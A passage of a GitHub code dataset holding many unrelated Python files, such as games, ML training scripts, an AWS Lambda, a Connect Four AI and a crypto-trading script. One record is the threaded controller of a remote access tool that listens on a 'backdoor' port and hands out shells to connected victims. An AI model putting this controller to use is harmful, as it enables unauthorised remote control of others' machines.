money.\nmoney_left = amount_sold_for - commission_paid_2\nprint(f'Joe has ${money_left} left')","repo_name":"mayawagle/Programming","sub_path":"Starting out with python/ch 2/exercises/stock_transaction_program.py","file_name":"stock_transaction_program.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14552102274","text":"'''\nFunction:\n\t贪吃蛇小游戏\nAuthor:\n\tCharles\n微信公众号:\n\tCharles的皮卡丘\n'''\nimport cfg\nimport pygame\nfrom modules.food import *\nfrom modules.snake import *\nfrom modules.utils import *\nfrom modules.endInterface import *\n\n\n'''主函数'''\ndef main(cfg):\n\t# 游戏初始化\n\tpygame.init()\n\tscreen = pygame.display.set_mode(cfg.SCREENSIZE)\n\tpygame.display.set_caption('Greedy Snake —— 微信公众号:Charles的皮卡丘')\n\tclock = pygame.time.Clock()\n\t# 播放背景音乐\n\tpygame.mixer.music.load(cfg.BGMPATH)\n\tpygame.mixer.music.play(-1)\n\t# 游戏主循环\n\tsnake = Snake(cfg)\n\tapple = Apple(cfg, snake.coords)\n\tscore = 0\n\twhile True:\n\t\tscreen.fill(cfg.BLACK)\n\t\t# --按键检测\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key in [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT]:\n\t\t\t\t\tsnake.setDirection({pygame.K_UP: 'up', pygame.K_DOWN: 'down', pygame.K_LEFT: 'left', pygame.K_RIGHT: 'right'}[event.key])\n\t\t# --更新贪吃蛇和食物\n\t\tif snake.update(apple):\n\t\t\tapple = Apple(cfg, snake.coords)\n\t\t\tscore += 1\n\t\t# --判断游戏是否结束\n\t\tif snake.isgameover: break\n\t\t# --显示游戏里必要的元素\n\t\tdrawGameGrid(cfg, screen)\n\t\tsnake.draw(screen)\n\t\tapple.draw(screen)\n\t\tshowScore(cfg, score, screen)\n\t\t# --屏幕更新\n\t\tpygame.display.update()\n\t\tclock.tick(cfg.FPS)\n\treturn endInterface(screen, cfg)\n\n\n'''run'''\nif __name__ == '__main__':\n\twhile True:\n\t\tif not main(cfg):\n\t\t\tbreak","repo_name":"akkiteja/ALL-GAMES","sub_path":"Game24/Game24.py","file_name":"Game24.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37327848250","text":"import numpy as np\nfrom numpy import newaxis as na\n\n\ndef lrp_linear(hin, w, b, hout, Rout, bias_nb_units, eps, bias_factor, debug=False):\n \"\"\"\n LRP for a linear layer with input dim D and output dim M.\n Args:\n - hin: forward pass input, of shape (D,)\n - w: connection weights, of shape (D, M)\n - b: biases, of shape (M,)\n - hout: forward pass output, of shape (M,) (unequal to np.dot(w.T,hin)+b if more than one incoming layer!)\n - Rout: relevance at layer output, of shape (M,)\n - bias_nb_units: number of lower-layer units onto which the bias/stabilizer contribution is redistributed\n - eps: stabilizer (small positive number)\n - bias_factor: for global relevance conservation set to 1.0, otherwise 0.0 to ignore bias redistribution\n Returns:\n - Rin: relevance at layer input, of shape (D,)\n \"\"\"\n sign_out = np.where(hout[na,:]>=0, 1., -1.) # shape (1, M)\n \n #numer = (w * hin[:,na]) + ( (bias_factor*b[na,:]*1. + eps*sign_out*1.) * 1./bias_nb_units ) # shape (D, M)\n numer = (w * hin[:,na]) + ( (bias_factor*b[na,:]*1.) * 1./bias_nb_units ) # shape (D, M)\n \n denom = hout[na,:] + (eps*sign_out*1.) # shape (1, M)\n \n message = (numer/denom) * Rout[na,:] # shape (D, M)\n \n Rin = message.sum(axis=1) # shape (D,)\n \n # Note: local layer relevance conservation if bias_factor==1.0 and bias_nb_units==D\n # global network relevance conservation if bias_factor==1.0 (can be used for sanity check)\n if debug:\n print(\"local diff: \", Rout.sum() - Rin.sum())\n \n return Rin\n","repo_name":"NPoe/neural-nlp-explanation-experiment","sub_path":"HybridDocuments/ThirdParty/LRP_and_DeepLIFT/code/LRP_linear_layer.py","file_name":"LRP_linear_layer.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"12954145434","text":"import boto3\nimport json\nimport logging\nimport requests\n\nfrom crhelper import CfnResource\n\nlogger = logging.getLogger(__name__)\nhelper = CfnResource(\n json_logging=False, log_level='DEBUG', boto_level='CRITICAL')\n\ntry:\n client = boto3.client(\"iam\")\nexcept Exception as e:\n helper.init_failure(e)\n\ndef get_parameters(event):\n name = event['ResourceProperties']['Name']\n url = event['ResourceProperties']['URL']\n if 'Metadata' in event['ResourceProperties']:\n metadata = event['ResourceProperties']['Metadata']\n else:\n metadata = get_metadata(url)\n\n return name, metadata, url\n\ndef get_metadata(url):\n response = requests.get(url)\n metadata = response.text\n logger.info(\"metadata = \" + metadata)\n if response.status_code != requests.codes.ok:\n raise response.raise_for_status()\n return metadata\n\ndef create_provider(name, metadata, url):\n response = client.create_saml_provider(\n Name=name,\n SAMLMetadataDocument=metadata\n )\n physical_resource_id = response['SAMLProviderArn']\n logger.info(\"created SAML provider \" + physical_resource_id)\n data = { \"Name\": name }\n helper.Data = data\n return physical_resource_id\n\n@helper.create\ndef create(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n return create_provider(*get_parameters(event))\n\n@helper.delete\ndef delete(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n physical_resource_id = event['PhysicalResourceId']\n logger.info(\"deleting SAML provider \" + physical_resource_id)\n client.delete_saml_provider(\n SAMLProviderArn=physical_resource_id\n )\n\n@helper.update\ndef update(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n physical_resource_id = event['PhysicalResourceId']\n new_properties = event['ResourceProperties']\n\n if 'Metadata' in new_properties:\n metadata = new_properties['Metadata']\n else:\n metadata = get_metadata(new_properties['URL'])\n\n response = client.update_saml_provider(\n SAMLProviderArn=physical_resource_id,\n SAMLMetadataDocument=metadata\n )\n physical_resource_id = response['SAMLProviderArn']\n logger.info(\"updated SAML provider \" + physical_resource_id)\n data = { \"Name\": new_properties['Name'] }\n helper.Data = data\n return physical_resource_id\n\ndef lambda_handler(event, context):\n helper(event, context)\n","repo_name":"Sage-Bionetworks-IT/cfn-cr-saml-provider","sub_path":"saml_provider/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70413997286","text":"\"\"\"\nScript to load a dataset, train a series of ML models, and save them to bentoml\n\"\"\"\nimport bentoml\nimport os\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nfrom sklearn.tree import DecisionTreeClassifier\nfrom typing import Tuple\n\n\ndef load_dataset(data_path: str, col_names: list[str]) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"Function to load a dataset from memory\n\n :param data_path: File path to the data to be loaded\n :type data_path: str\n :param col_names: A list of the desired colun names\n :type col_names: list[str]\n :return: _description_\n :rtype: Tuple[pd.DataFrame, pd.DataFrame]\n \"\"\"\n # Load the iris dataset\n temp_df = pd.read_csv(data_path, header=None)\n # Give each column a meaninful name\n temp_df.columns = col_names\n # Create a label encoder\n label_encoder = LabelEncoder()\n # Assign labels to the iris species class\n temp_labels = pd.DataFrame()\n temp_labels[\"Label\"] = label_encoder.fit_transform(temp_df[\"Class\"])\n # Drop the class from the main data\n temp_df = temp_df.drop(columns=[\"Class\"])\n\n return temp_df, temp_labels\n\n\ndef fit_scaler(df: pd.DataFrame) -> StandardScaler:\n \"\"\"Function to fit a standard scaler to the Iris dataset\n\n :param df: DataFrame of iris data, including: Sepal Length, Sepal Width, Petal Length, and Petal Width\n :type df: pd.DataFrame\n :return: Returns a fitted standard scaler\n :rtype: StandardScaler\n \"\"\"\n scaler = StandardScaler()\n scaler.fit(df)\n\n return scaler\n\n\ndef scale_data(df: pd.DataFrame, scaler: StandardScaler) -> pd.DataFrame:\n \"\"\"Function to fit data using a StandardScaler\n\n :param df: DataFrame of data to be scaled\n :type df: pd.DataFrame\n :param scaler: A fitted scaler object\n :type scaler: StandardScaler\n :return: Returns a dataframe of scaled data\n :rtype: pd.DataFrame\n \"\"\"\n return pd.DataFrame(scaler.transform(df), columns=df.columns)\n\n\ndef split_dataset(df: pd.DataFrame, labels: pd.DataFrame) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Function to split a dataset 70/30 train/test\n\n :param df: Dataframe containing data to be split\n :type df: pd.DataFrame\n :param labels: DataFrame containing iris labels\n :type labels: pd.DataFrame\n :return: Returns a tuple of train/test data and labels\n :rtype: Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]\n \"\"\" \n\n features = df.values[:, 0:4].reshape(len(df), 4)\n labels = labels.values[:, 0]\n\n tr_X, ts_X, tr_y, ts_y = train_test_split(features, labels, test_size=0.3, random_state=42)\n tr_y = tr_y.astype('int')\n ts_y = ts_y.astype('int')\n\n return tr_X, ts_X, tr_y, ts_y\n\n\nif __name__ == \"__main__\":\n print(\"Hello world\")\n\n # Load the iris dataset\n iris_df, iris_labels = load_dataset(f\"{os.getcwd()}/data/iris.data\", [\"Sepal Length\", \"Sepal Width\",\n \"Petal Length\", \"Petal Width\", \"Class\"])\n\n # Create, fit, and save a standard scaler\n iris_scaler = fit_scaler(iris_df)\n bentoml.sklearn.save_model(\"scaler\", iris_scaler)\n\n # Scale the dataset\n scaled_df = scale_data(iris_df, iris_scaler)\n\n # Split the data into train and test\n train_features, test_features, train_labels, test_labels = split_dataset(iris_df, iris_labels)\n\n # Train and save a range of basic ML models\n lr = LogisticRegression(random_state=0).fit(train_features, train_labels)\n bentoml.sklearn.save_model(\"logistic_regression\", lr)\n\n knn = KNeighborsClassifier(n_neighbors=3).fit(train_features, train_labels)\n bentoml.sklearn.save_model(\"knn\", knn)\n\n gnb = GaussianNB().fit(train_features, train_labels)\n bentoml.sklearn.save_model(\"gaussian_naive_bayes\", gnb)\n\n dt = DecisionTreeClassifier().fit(train_features, train_labels)\n bentoml.sklearn.save_model(\"decision_tree\", dt)\n\n rf = RandomForestClassifier(max_depth=2, random_state=0).fit(train_features, train_labels)\n bentoml.sklearn.save_model(\"random_forest\", rf)\n","repo_name":"ABillington96/Bento-Kitchen","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1844980917","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 10 11:46:15 2018\r\n\r\n@author: User\r\n\"\"\"\r\nimport pyautogui \r\n\r\npyautogui.FAIL_SAFE = True\r\npyautogui.PAUSE = 1 \r\n\r\n# size cua man hinh\r\nheight,width = pyautogui.size()\r\n# vi tri hien tai cua chuot\r\nposition = pyautogui.position()\r\n#di chuyen chuot toi\r\npyautogui.moveTo(300,400)\r\n\r\npyautogui.moveTo(250,110)\r\npyautogui.click(x=250, y=110, clicks=1, interval=0, button='left')\r\npyautogui.click(x=350, y=110, clicks=1, interval=0, button='right')\r\n\r\npyautogui.click(x=250, y=690, clicks=1, interval=0, button='left')\r\n\r\nkeys = \"hhh\"\r\npyautogui.press(keys, presses=1, interval=0.0, pause=None, _pause=True)\r\n\r\n\r\n\r\nfrom pynput.keyboard import Key, Controller\r\n\r\n\r\n","repo_name":"mis-drug-dealer/anythings_py","sub_path":"automation.py","file_name":"automation.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6597573390","text":"import os\nimport sys\n\nimport lightgbm as lgb\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_validate, PredefinedSplit\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom utils import *\n\nsns.set_style('darkgrid')\n\nNAME = 'v4'\n\nprint('load datasets')\nfeats = ['basic', 'main_days_to_years', 'main_days_pairwise', 'main_money_pairwise']\ndfs = [pd.read_feather(WORKING / f'{f}_train.ftr') for f in feats]\nX_train = pd.concat(dfs, axis=1)\ndfs = [pd.read_feather(WORKING / f'{f}_test.ftr') for f in feats]\nX_test = pd.concat(dfs, axis=1)\n\ny_train = pd.read_feather(WORKING / 'y_train.ftr').TARGET\n\nprint(X_train.shape)\nprint(X_test.shape)\n\ncv_id = pd.read_feather(INPUT / 'cv_id.ftr').cv_id\ncv = PredefinedSplit(cv_id)\n\nlgb_params = {\n 'n_estimators': 1000,\n 'learning_rate': 0.1,\n 'num_leaves': 31,\n 'colsample_bytree': 0.8,\n 'subsample': 0.9,\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.1,\n 'min_split_gain': 0.01,\n 'min_child_weight': 2,\n 'random_state': 77\n}\n\nprint('5-fold CV')\nscore = cross_validate(lgb.LGBMClassifier(**lgb_params), X_train, y_train, cv=cv.split(X_train, y_train),\n scoring='roc_auc', n_jobs=4, verbose=4)\n\nvalid_score = score['test_score'].mean()\nprint('val:', valid_score)\n\nprint('train')\nmodel = lgb.LGBMClassifier(**lgb_params)\nmodel.fit(X_train, y_train)\n\nprint(f'val = {valid_score};\\nfeats = {feats};\\nlgb_params = {lgb_params}')\ngenerate_submit(model.predict_proba(X_test)[:, 1], f'{NAME}_{valid_score:.4f}')\n\nprint('output feature importances')\nfeat_df = pd.DataFrame({'importance': model.feature_importances_}, index=X_train.columns).sort_values('importance')\nfeat_df[-50:].plot.barh(figsize=(20, 15))\nplt.savefig(str(Path().home() / f'Dropbox/kaggle/{NAME}_feats.pdf'))\n","repo_name":"amaotone/home-credit-default-risk","sub_path":"lgbm/v4.py","file_name":"v4.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"30078752770","text":"import random\nimport numpy as np\nfrom typing import Tuple, Optional\n\nfrom logic.game_logic import GameLogic, SECOND_PLAYER_CODE, FIRST_PLAYER_CODE, EMPTY_CODE, EXIT_CODE, EXIT_SYMBOLS\nfrom logic.game_objects import Board\n\n\ndef free_position(column: np.array) -> int:\n \"\"\"\n find the first free position in column\n numeration from 1\n\n :param column: array slice\n :return:\n position index,\n -1 - if the whole column is free,\n 0 - if the column has no free place\n \"\"\"\n if np.all(column == 0): # if the whole column is free\n return -1\n return np.argmax(column > 0) # first empty position (numeration from 1) in column or 0\n\n\nclass Player:\n def __init__(self, name: str, color: str = \"white\"):\n self.name = name\n self.color = color\n\n def make_move(self, board: Board) -> Tuple[int, int]:\n pass\n\n\nclass Human(Player):\n def make_move(self, board) -> Tuple[int, int]:\n \"\"\"\n human player move, player chooses just column number\n\n :param board: game board\n :return: chosen position, (EXIT_CODE, EXIT_CODE) or (-1, -1) - wrong move\n \"\"\"\n try:\n input_str = input(\"Enter column number: \")\n column_number = int(input_str) - 1\n column = board.field[:, column_number] # get the column\n except (ValueError, IndexError) as e:\n if input_str.lower() in EXIT_SYMBOLS:\n return EXIT_CODE, EXIT_CODE\n print(e)\n return -1, -1 # wrong input - wrong move\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n\n return row_number, column_number\n\n\nclass AI(Player):\n def __init__(self, game_logic: GameLogic):\n \"\"\"\n AI name = \"AI\",\n AI color = \"red\"\n\n :param game_logic: AI needs game logic to check win\n \"\"\"\n name = \"AI\"\n color = \"red\"\n super().__init__(name, color)\n self.game_logic = game_logic\n\n def make_move(self, board: Board) -> Tuple[int, int]:\n \"\"\"\n AI try to make win move,\n then try to prevent the enemy win,\n and then make move\n\n :param board: game board\n :return: location for the new piece\n \"\"\"\n input(\"press enter...\") # for delay\n return (\n self.winning_move(board) or\n self.blocking_move(board) or\n self.random_move(board)\n )\n\n def winning_move(self, board: Board) -> Optional[Tuple[int, int]]:\n \"\"\"\n try to do winning move\n\n :param board: game board\n :return: winning position if exist\n \"\"\"\n return self._common_move(board, code=SECOND_PLAYER_CODE)\n\n def blocking_move(self, board: Board) -> Optional[Tuple[int, int]]:\n \"\"\"\n try to do blocking move\n\n :param board: game board\n :return: blocking enemy winning position if exist\n \"\"\"\n return self._common_move(board, code=FIRST_PLAYER_CODE)\n\n def random_move(self, board: Board) -> Tuple[int, int]:\n \"\"\"\n \n\n :param board: game board\n :return: position by AI logic\n \"\"\"\n row_number = -1\n while row_number < 0:\n column_number = random.randint(0, board.length - 1)\n column = board.field[:, column_number] # get the column\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n\n return row_number, column_number\n\n def _common_move(self, board: Board, code: int = SECOND_PLAYER_CODE) -> Optional[Tuple[int, int]]:\n \"\"\"\n difference between winning_move and blocking_move is just\n which player code is a winner\n\n :param board: game board\n :param code: AI/not_AI _CODE\n :return: winning position\n \"\"\"\n for column_number, column in enumerate(board.field.T): # iterate by columns\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n if row_number < 0:\n continue\n\n board.place_piece(code, (row_number, column_number))\n if self.game_logic.win_situation(board):\n # we shouldn't place the piece, just return location\n board.place_piece(EMPTY_CODE, (row_number, column_number))\n return row_number, column_number\n board.place_piece(EMPTY_CODE, (row_number, column_number))\n return None\n","repo_name":"vvvin333/Connect-Four-Game","sub_path":"src/players/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19589466295","text":"import cv2\r\nfacePath = \"haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(facePath)\r\npath = \"haarcascade_eye.xml\"\r\neye_cascade = cv2.CascadeClassifier(path)\r\ncap = cv2.VideoCapture(1)\r\nwhile True:\r\n ret, frame = cap.read() # Capture frame-by-frame\r\n img = frame\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(gray,scaleFactor= 1.05,minNeighbors=8,minSize=(55, 55),flags=cv2.CASCADE_SCALE_IMAGE)\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = img[y:y+h, x:x+w]\r\n eyes = eye_cascade.detectMultiScale(roi_gray)\r\n for (ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\r\n cv2.imshow('Smile Detector', frame)\r\n c = cv2.waitKey(7) % 0x100\r\n if c == 27:\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"Robocrats/ComputerVision-with-OpenCV-Python3","sub_path":"Ch6/Ch06_14.py","file_name":"Ch06_14.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15336815625","text":"#!/usr/bin/env python3\n# _*_ encoding=utf-8 _*_\n\nimport json\n\n\ndef readData():\n with open('./data.json', 'r') as f:\n json_str = f.read()\n d = json.loads(json_str)\n return d\n\nd = readData()\nprint(d['seller'])\n","repo_name":"zenyuca/study-python3","sub_path":"IO/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14369039785","text":"#!/usr/bin/python3\n\"\"\"Prints each character in a string\"\"\"\nname = input(\"Name: \")\n\n\n\nfor c in name:\n if (c.lower() == \"f\"):\n print(c)\n break\nelse:\n print(\"You didn't find what you were looking for\")","repo_name":"ehoneahobed/python_pld","sub_path":"print_chars.py","file_name":"print_chars.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20500574587","text":"import threading\nfrom sys import exit\nfrom time import sleep\nfrom queue import Queue\nimport getpass\n\nfrom utils.connection import estabilish_connection\nfrom interface.menu import main_menu\n\n\nn_threads = 2\njobs = [1, 2]\nqueue = Queue()\n\naddrs = []\ncons = []\n\nip_addr = \"192.168.1.231\"\nport = 4444\nshell_port = 4666\n\n\ndef create_threads():\n for _ in range(n_threads):\n objThread = threading.Thread(target=work)\n objThread.daemon = True\n objThread.start()\n queue.join()\n\n\ndef create_jobs():\n for thread_id in jobs:\n queue.put(thread_id)\n queue.join()\n\n\ndef work():\n global ip_addr, port, shell_port\n while True:\n val = queue.get()\n if val == 1:\n conn, addr = estabilish_connection(ip_addr, port)\n cons.append(conn)\n addrs.append(addr)\n elif val == 2:\n while True:\n sleep(0.2)\n if len(addrs) > 0:\n main_menu(cons, addrs, ip_addr, port, shell_port, status=1)\n break\n queue.task_done()\n exit(0)\n\n\ndef setup():\n global KEY, ip_addr, port, shell_port\n key = getpass.getpass(\"Encryption password: \")\n if len(key) < 1:\n print(\"Password must be set\")\n exit(0)\n KEY = bytes(key, 'utf-8')\n ip_addr = input(\"Enter inet interface [192.168.1.231]: \")\n if ip_addr == \"\":\n ip_addr = \"192.168.1.231\"\n port = input(\"Enter backdoor connection port [4444]: \")\n if port == \"\" or int(port) == 4444:\n port = 4444\n else:\n try:\n port = int(port)\n except:\n print(\"Invalid port type, must be integer\")\n exit(0)\n shell_port = input(\"Enter shell port [4666]: \")\n if shell_port == \"\" or int(shell_port) == 4666:\n shell_port = 4666\n else:\n try:\n shell_port = int(shell_port)\n except:\n print(\"Invalid port type, must be integer\")\n exit(0)\n\n\ndef threadpool_run():\n setup()\n create_threads()\n create_jobs()\n","repo_name":"rodfer0x80/ratpy","sub_path":"src/master/threadpool/threadpool.py","file_name":"threadpool.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26960504682","text":"import cv2\nimport numpy as np\nfrom Fragment import Fragment\n\nclass FragmentProcessor(object):\n \"\"\" Fragment Processor partitions and consolidates processed fragments \"\"\"\n\n @staticmethod\n def partition(frame):\n \"\"\" Partition Frame into processed fragments \n \n Args:\n frame (np.ndarry): Frame to partition.\n \n Returns: \n A list of Fragments derived from Frame.\n \"\"\"\n height, width = frame.shape[:2]\n partitionSize = height//4\n fragments = []\n\n for i in range(4):\n startPartition = i * partitionSize\n # Extract and color-process fragment\n fragment = Fragment(frame[startPartition:(startPartition + partitionSize), 0:width])\n\n # Set center points to be relative to full Frame\n fragment.setRelativeContourCtrX(0)\n fragment.setRelativeImageCtrX(0)\n fragment.setRelativeContourCtrY(startPartition)\n fragment.setRelativeImageCtrY(startPartition)\n\n fragments.append(fragment)\n\n return fragments\n\n @staticmethod\n def consolidate(fragments):\n \"\"\" Consolidate partitioned Fragments.\n \n Args:\n fragments (list[Fragment]): Fragments to consolidate.\n \n Returns: \n A 2D array of consolidated fragments.\n \"\"\"\n frame = fragments[0].processedFragment\n\n # Concatenate fragments into one Frame\n for i in range(1, len(fragments)):\n frame = np.concatenate((frame, fragments[i].processedFragment), axis=0)\n \n return frame\n","repo_name":"velin13/line-tracker","sub_path":"FragmentProcessor.py","file_name":"FragmentProcessor.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36922414046","text":"from JumpScale import j\n\nimport Models\nimport inspect\n\ntry:\n import mongoengine\nexcept:\n pass\n\n\nclass NameSpaceLoader():\n def __init__(self, modelsmodule):\n self._module = modelsmodule\n mongoengine.register_connection(self._module.DB, self._module.DB)\n self._getModels()\n\n def _getModels(self):\n self._models = list()\n self._modelspecs = dict()\n for name, mem in inspect.getmembers(self._module, inspect.isclass):\n if issubclass(mem, mongoengine.base.document.BaseDocument) and mongoengine.Document != inspect.getmro(mem)[0]:\n self._models.append(name)\n self._modelspecs[name] = mem\n self.__dict__[name] = mem\n\n def addModel(self, modelclass):\n self._models.append(modelclass._class_name)\n self._modelspecs[modelclass._class_name] = modelclass\n self.__dict__[modelclass._class_name] = modelclass\n\n def listModels(self):\n return self._models\n\n def connect2mongo(self, host='localhost', port=27017, db='jumpscale_system'):\n \"\"\"\n \"\"\"\n mongoengine.connect(db=db, alias=db, host=host, port=port)\n\n\nclass System(NameSpaceLoader):\n def __init__(self):\n self.__jslocation__ = \"j.data.models.system\"\n super(System, self).__init__(Models)\n","repo_name":"Cloudxtreme/jumpscale_core8","sub_path":"lib/JumpScale/data/models/BaseModelFactory.py","file_name":"BaseModelFactory.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4476793441","text":"def letterCombinations(digits: str):\n conv = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n def backtrack(combination, next_digits):\n if len(next_digits) == 0:\n ans.append(combination)\n else:\n for alpha in conv[next_digits[0]]:\n backtrack(combination + alpha, next_digits[1:])\n\n ans = []\n if digits:\n backtrack(\"\", digits)\n return ans\n\n\ndigits = \"245\"\nc = letterCombinations(digits)\nprint(c)\nprint(len(c))\n","repo_name":"24rochak/LeetCode","sub_path":"Letter Combinations of a Phone Number.py","file_name":"Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25936071976","text":"def f():\r\n for jol in range(6):\r\n for bagan in range(5):\r\n if(jol==0 and (bagan>=0 and bagan<5)) or\\\r\n (jol==1 and bagan==0) or\\\r\n (jol==2 and bagan==0)or\\\r\n (jol==3 and (bagan>=0 and bagan<5)) or\\\r\n (jol==4 and bagan==0) or\\\r\n (jol==5 and bagan==0):\r\n print('F',end=' ')\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\ndef I():\r\n for row in range(7):\r\n for column in range(3):\r\n if column == 1 or row == 0 or row == 6:\r\n print(\"I\", end=\" \")\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\n\r\ndef N():\r\n for row in range(7):\r\n for column in range(7):\r\n if row == column or (column == 0 and row != 0) \\\r\n or column == 6 and row != 6:\r\n print(\"N\", end=\" \")\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\ndef i():\r\n for j in range(6):\r\n for b in range(5):\r\n if(j==0 and (b>=0 and b<5)) or\\\r\n (j==1 and b==2) or\\\r\n (j==2 and b==2) or\\\r\n (j==3 and b==2) or\\\r\n (j==4 and b==2) or\\\r\n (j==5 and (b>=0 and b<5)):\r\n print('I',end=' ')\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\ndef one():\r\n for row in range(7):\r\n for column in range(3):\r\n if ((row >= 0 and row <= 2) and row + column == 2) \\\r\n or column == 2 and row != 0:\r\n print(\"1\", end=\" \")\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\nprint(\"I:\")\r\ni()\r\nN()\r\nprint(\"F:\")\r\nf()\r\nprint(\"1:\")\r\none()\r\nprint('')\r\none()\r\n","repo_name":"kuralovsa/Python","sub_path":"F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20650886413","text":"import time\nfrom time import timezone\n\nimport pyupbit\nimport datetime\nimport pytz\naccess_key = \"\"\nsecret_key = \"\"\n\nupbit = pyupbit.Upbit(access_key, secret_key)\n# krw = upbit.get_balance(\"KRW-ETH\")[2]\n\n #krw = upbit.get_balance()\n# ticker=\"KRW-ETH\"\nticker=\"KRW-BTC\"\nkrw = upbit.get_balance(\"KRW-AXS\")\n# print(krw)\norderbook = pyupbit.get_orderbook(ticker)\n\n\na1 = upbit.get_balance()\n# print(a1)\na2 = round(a1 // 10000)\n# print ('a2=',a2)\na3 = a2 * 10000\n# print(a3)\n\n# if ticker==\"KRW-XRP\":\n # print('same')\n#print('orderbook = ',orderbook)\nsell_price = orderbook['orderbook_units'][0]['bid_price']\n# sell_price = orderbook['ask_price'][0]['price']\n# print(sell_price)\n# unit = krw / float(sell_price)\n# unit = 10000 / float(sell_price)\n# upbit.buy_market_order(ticker, unit)\n# ret = upbit.buy_limit_order(ticker, 100, 50)\n# print(ret)\n# orderbook = pyupbit.get_orderbook(\"KRW-ETH\")\n# print(orderbook)\n# now = datetime.datetime.now(pytz.timezone('UTC'))\n# mid = datetime.datetime(now.year, now.month, now.day) + datetime.timedelta(1)\n# timezone(datetime.timedelta(hours=9))\n# print(now)\n# print(mid)\nnow = datetime.datetime.utcnow()\nmid = datetime.datetime(now.year, now.month, now.day) + datetime.timedelta(1)\nprint (now, mid)\n# time.sleep(3)\ndf = pyupbit.get_ohlcv(ticker)\n# print(df)\nyesterday = 